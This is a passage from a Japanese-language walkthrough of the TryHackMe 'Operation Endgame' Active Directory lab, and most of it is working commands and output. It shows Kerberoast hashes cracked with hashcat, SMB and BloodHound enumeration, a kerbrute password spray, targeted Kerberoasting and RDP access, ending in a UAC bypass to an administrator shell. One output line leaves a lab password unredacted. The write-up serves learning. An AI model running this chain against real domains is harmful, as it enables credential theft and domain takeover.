LDAP [target_ip] 389 AD $krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$f6c82f2bd61c4e0ccbbd2a715521785d1853392e9c7478a1e69ac70b938975ecaab9363d717de357883ef2ea1e2ed3f70dee8b8ac1aff3b9fd0f968569a2fcc797be8d57322e06fc8bb719d2b6e1783a5f045c323f39151b838944a721c14addbaf4723811f9efdfdb74b7a0272fa40e9000812b6f743ebeefd31443abd394cb880330c9c590ab574d0920f464716cd702b3e4d548753b3467133670d6d5961a7ff6fe2cf1fe36d7bcc4b52a3f8f004c8d94498268e3a0c151d0dbc685e9741fb24401993b7733a07bf03762b006aa3df24b85296529af729b30ad0a602dcd9f01e6eadfbe563e188d1e8c54f80606bc571de6d75a2ff099bb1051a49c8e192206d6375d458ae44f169a12cb0edad2a5d8cf525a3c0e6655bbcce9f9451b431a35033c457a8d29ce4ccec584e824515598d279b3535b13d52c3ed27f9404bb595e9dd38501c10738c48a2745f186baec784f514d5bfe98d4e756608375026bafa99c6cb09713150e5722c694990235a1d85bb5861166b6937650f0289c4b417a9fd6435f80986a9e9268e901d1136e42218fa55d1430cd79b3c6e2fce0baecd38d8d229525504b3003c1f2f410d359a9824c42b08158139a77b3fb58afbac8088e63f55952164c7e032779322b1bebba9d91a33de96e2ccd6a199ab83aa2825ff85e5f1708e8b6db7d9cbce79ed17618583ead9311f19069e136838daa2a604af61b16c359bd57a5c1fac70ec1dc62064ba3314f608d64a7f8a6f9d7e21ad882a72236723ba97aba34695a705bd751a820e93fc4e88cedf67ad4b827dfec9cd967f46802bfca7048938f6b4ffdda51ed2986369f6ec3c92d21642aa23f3f9450eb92e69057fbfc6de5e8b545ddfeb68d900218d02494fb60c025136a2f2aa100ed9c7e3e0bad1743172bc95a8227175369a23ef8f5d022fdfe3e2b06e5b3ffc6d94dbfd72ce62f0482ee43f9a10cc0e5c64c23f86156e548f954a705c56950fa9d86d5282ae56e51983dee44bebfac3e060b219e77158aeee68f3a445464f6993d547165bb7a739288a5b10764ac2c3ffab8dadc4070d474010290f1c89ecee31497f065291cc5914c5e4f9fc3d92be5d9dff34e5ea977dd479da73a28f032467123a7000683852d27a7c28ab81af915d02c51663cd03d9224d67df2234784f70947e0f2bffaaa8838abb03781fdeb14940bfeaa29154431b2415800c90dc12bfcabac095b01d4815301d095058282369449d7d82fbc50443f3cbe0b84d2052c99020fb0791164604edc1afce7716527c7734eb141bbd3f2329b6b84e9c3f43b247fb321d52c8f41c3a3d2193277434d2099830d3b939b2e191bcbeab7368a75f5b4256c2310f34b1c48668286f21efe3ff1b4323aef8f5a82b6fd5eb2e0e9
すると、なんとCODY_ROYのTGSチケットを吐きました。
解読してみたところ、パスワードをクラックすることに成功しました。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ echo '$krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$f6c82f2bd61c4e0ccbbd2a715521785d1853392e9c7478a1e69ac70b938975ecaab9363d717de357883ef2ea1e2ed3f70dee8b8ac1aff3b9fd0f968569a2fcc797be8d57322e06fc8bb719d2b6e1783a5f045c323f39151b838944a721c14addbaf4723811f9efdfdb74b7a0272fa40e9000812b6f743ebeefd31443abd394cb880330c9c590ab574d0920f464716cd702b3e4d548753b3467133670d6d5961a7ff6fe2cf1fe36d7bcc4b52a3f8f004c8d94498268e3a0c151d0dbc685e9741fb24401993b7733a07bf03762b006aa3df24b85296529af729b30ad0a602dcd9f01e6eadfbe563e188d1e8c54f80606bc571de6d75a2ff099bb1051a49c8e192206d6375d458ae44f169a12cb0edad2a5d8cf525a3c0e6655bbcce9f9451b431a35033c457a8d29ce4ccec584e824515598d279b3535b13d52c3ed27f9404bb595e9dd38501c10738c48a2745f186baec784f514d5bfe98d4e756608375026bafa99c6cb09713150e5722c694990235a1d85bb5861166b6937650f0289c4b417a9fd6435f80986a9e9268e901d1136e42218fa55d1430cd79b3c6e2fce0baecd38d8d229525504b3003c1f2f410d359a9824c42b08158139a77b3fb58afbac8088e63f55952164c7e032779322b1bebba9d91a33de96e2ccd6a199ab83aa2825ff85e5f1708e8b6db7d9cbce79ed17618583ead9311f19069e136838daa2a604af61b16c359bd57a5c1fac70ec1dc62064ba3314f608d64a7f8a6f9d7e21ad882a72236723ba97aba34695a705bd751a820e93fc4e88cedf67ad4b827dfec9cd967f46802bfca7048938f6b4ffdda51ed2986369f6ec3c92d21642aa23f3f9450eb92e69057fbfc6de5e8b545ddfeb68d900218d02494fb60c025136a2f2aa100ed9c7e3e0bad1743172bc95a8227175369a23ef8f5d022fdfe3e2b06e5b3ffc6d94dbfd72ce62f0482ee43f9a10cc0e5c64c23f86156e548f954a705c56950fa9d86d5282ae56e51983dee44bebfac3e060b219e77158aeee68f3a445464f6993d547165bb7a739288a5b10764ac2c3ffab8dadc4070d474010290f1c89ecee31497f065291cc5914c5e4f9fc3d92be5d9dff34e5ea977dd479da73a28f032467123a7000683852d27a7c28ab81af915d02c51663cd03d9224d67df2234784f70947e0f2bffaaa8838abb03781fdeb14940bfeaa29154431b2415800c90dc12bfcabac095b01d4815301d095058282369449d7d82fbc50443f3cbe0b84d2052c99020fb0791164604edc1afce7716527c7734eb141bbd3f2329b6b84e9c3f43b247fb321d52c8f41c3a3d2193277434d2099830d3b939b2e191bcbeab7368a75f5b4256c2310f34b1c48668286f21efe3ff1b4323aef8f5a82b6fd5eb2e0e9' > cody.hash
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ hashcat -m 13100 cody.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (7604 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$f6c82f2bd61c4e0ccbbd2a715521785d1853392e9c7478a1e69ac70b938975ecaab9363d717de357883ef2ea1e2ed3f70dee8b8ac1aff3b9fd0f968569a2fcc797be8d57322e06fc8bb719d2b6e1783a5f045c323f39151b838944a721c14addbaf4723811f9efdfdb74b7a0272fa40e9000812b6f743ebeefd31443abd394cb880330c9c590ab574d0920f464716cd702b3e4d548753b3467133670d6d5961a7ff6fe2cf1fe36d7bcc4b52a3f8f004c8d94498268e3a0c151d0dbc685e9741fb24401993b7733a07bf03762b006aa3df24b85296529af729b30ad0a602dcd9f01e6eadfbe563e188d1e8c54f80606bc571de6d75a2ff099bb1051a49c8e192206d6375d458ae44f169a12cb0edad2a5d8cf525a3c0e6655bbcce9f9451b431a35033c457a8d29ce4ccec584e824515598d279b3535b13d52c3ed27f9404bb595e9dd38501c10738c48a2745f186baec784f514d5bfe98d4e756608375026bafa99c6cb09713150e5722c694990235a1d85bb5861166b6937650f0289c4b417a9fd6435f80986a9e9268e901d1136e42218fa55d1430cd79b3c6e2fce0baecd38d8d229525504b3003c1f2f410d359a9824c42b08158139a77b3fb58afbac8088e63f55952164c7e032779322b1bebba9d91a33de96e2ccd6a199ab83aa2825ff85e5f1708e8b6db7d9cbce79ed17618583ead9311f19069e136838daa2a604af61b16c359bd57a5c1fac70ec1dc62064ba3314f608d64a7f8a6f9d7e21ad882a72236723ba97aba34695a705bd751a820e93fc4e88cedf67ad4b827dfec9cd967f46802bfca7048938f6b4ffdda51ed2986369f6ec3c92d21642aa23f3f9450eb92e69057fbfc6de5e8b545ddfeb68d900218d02494fb60c025136a2f2aa100ed9c7e3e0bad1743172bc95a8227175369a23ef8f5d022fdfe3e2b06e5b3ffc6d94dbfd72ce62f0482ee43f9a10cc0e5c64c23f86156e548f954a705c56950fa9d86d5282ae56e51983dee44bebfac3e060b219e77158aeee68f3a445464f6993d547165bb7a739288a5b10764ac2c3ffab8dadc4070d474010290f1c89ecee31497f065291cc5914c5e4f9fc3d92be5d9dff34e5ea977dd479da73a28f032467123a7000683852d27a7c28ab81af915d02c51663cd03d9224d67df2234784f70947e0f2bffaaa8838abb03781fdeb14940bfeaa29154431b2415800c90dc12bfcabac095b01d4815301d095058282369449d7d82fbc50443f3cbe0b84d2052c99020fb0791164604edc1afce7716527c7734eb141bbd3f2329b6b84e9c3f43b247fb321d52c8f41c3a3d2193277434d2099830d3b939b2e191bcbeab7368a75f5b4256c2310f34b1c48668286f21efe3ff1b4323aef8f5a82b6fd5eb2e0e9:[cracked_password1]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*...b2e0e9
Time.Started.....: Sat Apr 18 23:25:37 2026 (1 sec)
Time.Estimated...: Sat Apr 18 23:25:38 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 2797.2 kH/s (2.99ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 712704/14344385 (4.97%)
Rejected.........: 0/712704 (0.00%)
Restore.Point....: 700416/14344385 (4.88%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: albe69 -> Ananas
Hardware.Mon.#01.: Temp: 43c Util: 20%
Started: Sat Apr 18 23:25:36 2026
Stopped: Sat Apr 18 23:25:39 2026
クラックした資格情報をもとにSamaba列挙してみましょう。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ nxc smb AD.thm.local -u CODY_ROY -p '[cracked_password1]' --shares
SMB [target_ip] 445 AD [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB [target_ip] 445 AD [+] thm.local\CODY_ROY:MKO)mko0
SMB [target_ip] 445 AD [*] Enumerated shares
SMB [target_ip] 445 AD Share Permissions Remark
SMB [target_ip] 445 AD ----- ----------- ------
SMB [target_ip] 445 AD ADMIN$ Remote Admin
SMB [target_ip] 445 AD C$ Default share
SMB [target_ip] 445 AD IPC$ READ Remote IPC
SMB [target_ip] 445 AD NETLOGON READ Logon server share
SMB [target_ip] 445 AD SYSVOL READ Logon server share
この資格情報は有効であることがわかります。
試しにwinrmにもアクセスできるかを検証したところ、接続を拒否されてしまいました。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ evil-winrm -i [target_ip] -u CODY_ROY -p '[cracked_password1]'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: Connection timeout or error occurred: Errno::ECONNREFUSED - Connection refused - Connection refused - connect(2) for "[target_ip]" port 5985 (10.48.183.252:5985)
Warning: Cleaning up and exiting...
これは、少し考え直す必要がありそうです。今回、ユーザーアカウントがそもそも多くあったので、むしろBloodhoundを使用した方が見やすいかもしれません。
そこで、以下を実行し、データ収集を行いました。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ bloodhound-python -u CODY_ROY -p '[cracked_password1]' -d thm.local -ns [target_ip] -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: ad.thm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: ad.thm.local
INFO: Found 490 users
INFO: Found 53 groups
INFO: Found 4 gpos
INFO: Found 216 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: ad.thm.local
INFO: Done in 01M 24S
なんと収集することに成功しました。
Bloodhoundを使用し、環境を分析したところ、CODY_ROYは興味深い権限がいくつかあります。グループの一員としてEVERYONEに所属しています。また、このユーザーはGenericWriteを持つさまざまなユーザーに対する権限を持っており、それによって各ユーザーに対してシャドウクレデンシャル攻撃やターゲット型Kerberoast攻撃を実行できます。しかし、一見すると、これらのユーザーには興味深い権限やグループメンバーシップはありません。
また、CODY_ROYは特別なグループにも属していません。
以下のユーザーをドメイン管理者として特定できます。
さらに見てみると、ドメイン管理者への最短経路を見てみると、ユーザー「guest」には特別な権限が付与されていることがわかります。これにより、ドメイン管理者への権限昇格が可能になります。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#bloodhound-enumeration
(kali Linuxでスクショを撮るのは面倒なので、これで許してください。)
Lateral Movement
要はこういう順序で侵害していく必要があります。
GUEST@THM.LOCAL → MARGARITO_HAMILTON@THM.LOCAL → DOMAIN ADMIN@THM.LOCAL
ただ、糸口が見えません。
そこで、kerbruteを使用して、既存のパスワードを使っている他のユーザーでも使えるかを調べてみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ./kerbrute passwordspray -d 'thm.local' --dc [target_ip] usernames.txt '[cracked_password1]'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 04/19/26 - Ronnie Flathers @ropnop
2026/04/19 00:08:04 > Using KDC(s):
2026/04/19 00:08:04 > [target_ip]
2026/04/19 00:08:06 > [+] VALID LOGIN: CODY_ROY@thm.local:[cracked_password1]
2026/04/19 00:08:17 > [+] VALID LOGIN: ZACHARY_HUNT@thm.local:[cracked_password1]
2026/04/19 00:08:24 > Done! Tested 492 logins (2 successes) in 19.580 seconds
なんと、[cracked_password1]はZACHARY_HUNTというユーザーアカウントでも使用されていることがわかります。
Bloodhoundで見てみると、JERRI_LANCASTERに対して、GenericWrite権限であることが判明します。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-zachary_hunt
そこで、JERRI_LANCASTERに対して、kerberoasting攻撃できないかを検証してみます。
以下のようなコマンドを実行しましょう。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ./targetedKerberoast.py -d 'thm.local' -u 'zachary_hunt' -p '[cracked_password1]' --request-user 'jerri_lancaster' --dc-ip [target_ip]
[*] Starting kerberoast attacks
[*] Attacking user (jerri_lancaster)
[+] Printing hash for (JERRI_LANCASTER)
$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$6f842995839286e2f3ac567d4758cad25e787f6f241de4644bc1a7bfaffdb3a3fea5f2db395d973a93ae3a9c540059c0a3cf789af3bc70b379924f03f38d1b8d3d52b9055f6bbe8de835088e0e0e3287bda02355cacb696a7def6bb96d24974f5085076e8ed7de7b0ef33bcd1afdb3d531060a3a0d618f89683e247b16aa82fffd724a0b1e49dd9213fee036f7579e49b41748e4a631a6e1063d2082fd12f3f44d4b181b133a3301ec51e3d263d9853ae8e4b5bfc29be69157f04345bb9f00eb9a42bd6f1e154f56e470c861c619f4a34b710e0ec94e6a951e5ef247942e6b3533439ff32b415f69106afeaa9b8ed8d54116ded7cd0940f6d929ca45e3561ee56797d475d041e7c14cbc148e2fed2c0dffa8c0e47075940ca5a121eb3d34becf796e82c2047c084815f95d93ae6d27d0e60dd0a07f60eb4f22841ddf985f6a199e49d696b8799080c901babd1d56549583e4ef5c28cf0c4c4643e5a811e342a56e870d2c35f830224a49eeabd67f147f829ae7c5ee31f19acbad892d86892d5725280a840fd56e1c2e180653eadd88845527be5e8271218b7d03e29766829cfc64a63f0cdd6f5ac2813d7a43f79a07af353607f302748fea9c0fd3f8ef48a4c434bb3a6cd9cdda09242eac361da143207f402ec113cb9c28fbba1fc7ee751d10e17d9f8202a66073b81799832f1f84407049d4223dd7ba4ba4ea27cc583d115baf835d714102c4086261de0230e5f075ff371d8600802362cf69b1ecb3f563c1916962c0775c6e672c6d6dc7896caf8ebbab6955a86d2bf6ee5bc55c1da95e8a29a268277cc5e552964826832f8ed5354b3058efdb6d0d15fcd42d6782ec73422fe42c026a14944215d3490610e54cea6b8bf18b9f1386fe0072548dfecd28fa75c199f6f7ee00c18981b60e615ec283f1e7c165c960eddaab199294c1e7db878a74be49b87d2382d05fbaa413d7133b62e005b728c9d8a03aff780650d0a2b27f1b5c16d6a374d54e4ca50fbde1d7dc10baf063950117f501f28c8de95c3c4d6158d80e5607e549057380d323ad810d952ab8f47118dac33ad69959ed3db5a44a0d6fb2e3addd861d12157978c06a4785e17bd21778e39415923d9f12a98cf4205fc1b505967964f6b21e60e79a02ce4929dee34b93249ba16a1b6fefb70590c31aaded9b821ad348883df49e2284c646d214341044d7dbd31bb365e91e0a912943300de8390cca6b8b53180b19dc2fa2ec9961b77e03fb0ae01855ac99c73af54acdedb5ebe6ece54845d50ef8f2a6c0bdb92aca79ff70e498030e9667580fbc7d608795f9170d1d0bd38359285b957dbadb552fa04ca601a775d0dc1df1eb29705a5440dd11336d3ae6d62b8fa1f22d036660e5bb3c00cb33cc5ac2aa96d8506006003debc16d9a0141f68e7dfc4f0dd7206a12acded9d917e3794f1d0afba04d4ef8eeb22f8caea9bd34c3110c5fc9e39605fd850e140889f26da0117a44e2587718eb80eabf06a360c4e38b2dea08e44a683080
すると、なんとJERRI_LANCASTERのTGSチケットを吐きました。
実際にパスワード解読してみましょう。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ echo '$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$6f842995839286e2f3ac567d4758cad25e787f6f241de4644bc1a7bfaffdb3a3fea5f2db395d973a93ae3a9c540059c0a3cf789af3bc70b379924f03f38d1b8d3d52b9055f6bbe8de835088e0e0e3287bda02355cacb696a7def6bb96d24974f5085076e8ed7de7b0ef33bcd1afdb3d531060a3a0d618f89683e247b16aa82fffd724a0b1e49dd9213fee036f7579e49b41748e4a631a6e1063d2082fd12f3f44d4b181b133a3301ec51e3d263d9853ae8e4b5bfc29be69157f04345bb9f00eb9a42bd6f1e154f56e470c861c619f4a34b710e0ec94e6a951e5ef247942e6b3533439ff32b415f69106afeaa9b8ed8d54116ded7cd0940f6d929ca45e3561ee56797d475d041e7c14cbc148e2fed2c0dffa8c0e47075940ca5a121eb3d34becf796e82c2047c084815f95d93ae6d27d0e60dd0a07f60eb4f22841ddf985f6a199e49d696b8799080c901babd1d56549583e4ef5c28cf0c4c4643e5a811e342a56e870d2c35f830224a49eeabd67f147f829ae7c5ee31f19acbad892d86892d5725280a840fd56e1c2e180653eadd88845527be5e8271218b7d03e29766829cfc64a63f0cdd6f5ac2813d7a43f79a07af353607f302748fea9c0fd3f8ef48a4c434bb3a6cd9cdda09242eac361da143207f402ec113cb9c28fbba1fc7ee751d10e17d9f8202a66073b81799832f1f84407049d4223dd7ba4ba4ea27cc583d115baf835d714102c4086261de0230e5f075ff371d8600802362cf69b1ecb3f563c1916962c0775c6e672c6d6dc7896caf8ebbab6955a86d2bf6ee5bc55c1da95e8a29a268277cc5e552964826832f8ed5354b3058efdb6d0d15fcd42d6782ec73422fe42c026a14944215d3490610e54cea6b8bf18b9f1386fe0072548dfecd28fa75c199f6f7ee00c18981b60e615ec283f1e7c165c960eddaab199294c1e7db878a74be49b87d2382d05fbaa413d7133b62e005b728c9d8a03aff780650d0a2b27f1b5c16d6a374d54e4ca50fbde1d7dc10baf063950117f501f28c8de95c3c4d6158d80e5607e549057380d323ad810d952ab8f47118dac33ad69959ed3db5a44a0d6fb2e3addd861d12157978c06a4785e17bd21778e39415923d9f12a98cf4205fc1b505967964f6b21e60e79a02ce4929dee34b93249ba16a1b6fefb70590c31aaded9b821ad348883df49e2284c646d214341044d7dbd31bb365e91e0a912943300de8390cca6b8b53180b19dc2fa2ec9961b77e03fb0ae01855ac99c73af54acdedb5ebe6ece54845d50ef8f2a6c0bdb92aca79ff70e498030e9667580fbc7d608795f9170d1d0bd38359285b957dbadb552fa04ca601a775d0dc1df1eb29705a5440dd11336d3ae6d62b8fa1f22d036660e5bb3c00cb33cc5ac2aa96d8506006003debc16d9a0141f68e7dfc4f0dd7206a12acded9d917e3794f1d0afba04d4ef8eeb22f8caea9bd34c3110c5fc9e39605fd850e140889f26da0117a44e2587718eb80eabf06a360c4e38b2dea08e44a683080' > jerri.hash
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ hashcat -m 13100 jerri.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (6023 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$6f842995839286e2f3ac567d4758cad25e787f6f241de4644bc1a7bfaffdb3a3fea5f2db395d973a93ae3a9c540059c0a3cf789af3bc70b379924f03f38d1b8d3d52b9055f6bbe8de835088e0e0e3287bda02355cacb696a7def6bb96d24974f5085076e8ed7de7b0ef33bcd1afdb3d531060a3a0d618f89683e247b16aa82fffd724a0b1e49dd9213fee036f7579e49b41748e4a631a6e1063d2082fd12f3f44d4b181b133a3301ec51e3d263d9853ae8e4b5bfc29be69157f04345bb9f00eb9a42bd6f1e154f56e470c861c619f4a34b710e0ec94e6a951e5ef247942e6b3533439ff32b415f69106afeaa9b8ed8d54116ded7cd0940f6d929ca45e3561ee56797d475d041e7c14cbc148e2fed2c0dffa8c0e47075940ca5a121eb3d34becf796e82c2047c084815f95d93ae6d27d0e60dd0a07f60eb4f22841ddf985f6a199e49d696b8799080c901babd1d56549583e4ef5c28cf0c4c4643e5a811e342a56e870d2c35f830224a49eeabd67f147f829ae7c5ee31f19acbad892d86892d5725280a840fd56e1c2e180653eadd88845527be5e8271218b7d03e29766829cfc64a63f0cdd6f5ac2813d7a43f79a07af353607f302748fea9c0fd3f8ef48a4c434bb3a6cd9cdda09242eac361da143207f402ec113cb9c28fbba1fc7ee751d10e17d9f8202a66073b81799832f1f84407049d4223dd7ba4ba4ea27cc583d115baf835d714102c4086261de0230e5f075ff371d8600802362cf69b1ecb3f563c1916962c0775c6e672c6d6dc7896caf8ebbab6955a86d2bf6ee5bc55c1da95e8a29a268277cc5e552964826832f8ed5354b3058efdb6d0d15fcd42d6782ec73422fe42c026a14944215d3490610e54cea6b8bf18b9f1386fe0072548dfecd28fa75c199f6f7ee00c18981b60e615ec283f1e7c165c960eddaab199294c1e7db878a74be49b87d2382d05fbaa413d7133b62e005b728c9d8a03aff780650d0a2b27f1b5c16d6a374d54e4ca50fbde1d7dc10baf063950117f501f28c8de95c3c4d6158d80e5607e549057380d323ad810d952ab8f47118dac33ad69959ed3db5a44a0d6fb2e3addd861d12157978c06a4785e17bd21778e39415923d9f12a98cf4205fc1b505967964f6b21e60e79a02ce4929dee34b93249ba16a1b6fefb70590c31aaded9b821ad348883df49e2284c646d214341044d7dbd31bb365e91e0a912943300de8390cca6b8b53180b19dc2fa2ec9961b77e03fb0ae01855ac99c73af54acdedb5ebe6ece54845d50ef8f2a6c0bdb92aca79ff70e498030e9667580fbc7d608795f9170d1d0bd38359285b957dbadb552fa04ca601a775d0dc1df1eb29705a5440dd11336d3ae6d62b8fa1f22d036660e5bb3c00cb33cc5ac2aa96d8506006003debc16d9a0141f68e7dfc4f0dd7206a12acded9d917e3794f1d0afba04d4ef8eeb22f8caea9bd34c3110c5fc9e39605fd850e140889f26da0117a44e2587718eb80eabf06a360c4e38b2dea08e44a683080:[cracked_password2]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JE...683080
Time.Started.....: Sun Apr 19 00:29:57 2026 (0 secs)
Time.Estimated...: Sun Apr 19 00:29:57 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 6043.4 kH/s (1.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 626688/14344385 (4.37%)
Rejected.........: 0/626688 (0.00%)
Restore.Point....: 614400/14344385 (4.28%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: mizzmoss -> lokita6
Hardware.Mon.#01.: Temp: 56c Util: 24%
Started: Sun Apr 19 00:29:57 2026
Stopped: Sun Apr 19 00:29:59 2026
すると、パスワードを解読することに成功しました。
ここでJERRI_LANCASTERはwriteowner権限を持つアカウントであるため、これは大きな成果です。
ここまで来たら、RDP接続できそうなので、以下のコマンドで接続を試みます。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ xfreerdp /v:[target_ip] /u:JERRI_LANCASTER /p:'[cracked_password2]' /d:thm.local /network:modem /compression -themes -wallpaper
RDP接続に成功しました。
しかし、どれを押しても反応しないため、win+Rを押し、CMDシェルを起動させます。
(UACバイパスに近いかもしれません)
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-jerri_lancaster
ここで、新たな新たなアカウントの資格情報を取得しました。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-jerri_lancaster
Privilege Escalation
BloodHoundで確認すると、SANFORD_DAUGHERTYはドメイン管理者であることがわかります。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
先ほど取得した資格情報でRDP接続を試みたところ、成功しました。
xfreerdp /v:[target_ip] /u:SANFORD_DAUGHERTY /p:[先ほど取得した資格情報のパスワード] /d:thm.local
先ほどと同様に、win+Rを押し、CMDシェルを起動させます。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
whoami /privで確認したところ、SeChangeNotifyPrivilegeがEnabledになっていることがわかります。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
このことから、Ctrl + Shift + Enterで、UAC Bypass攻撃として、管理者としてCMDシェルを起動することができます。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
すると、管理シェルを取得することに成功しました。
最後に、C:\Users\Administrator\Desktopに移動すると、フラグが取得できました。
引用: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
終わり
今回は、HardラボのActive Directory問題を解きましたが、むずいですね。久しぶりに解いたこともあってなかなか歯応えがありました。
また、Geminiとかに聞きながらやっていましたが、やはりAIペンテストにはまだまだ限界があるように思えました。
これが誰かの学びになることを祈っています。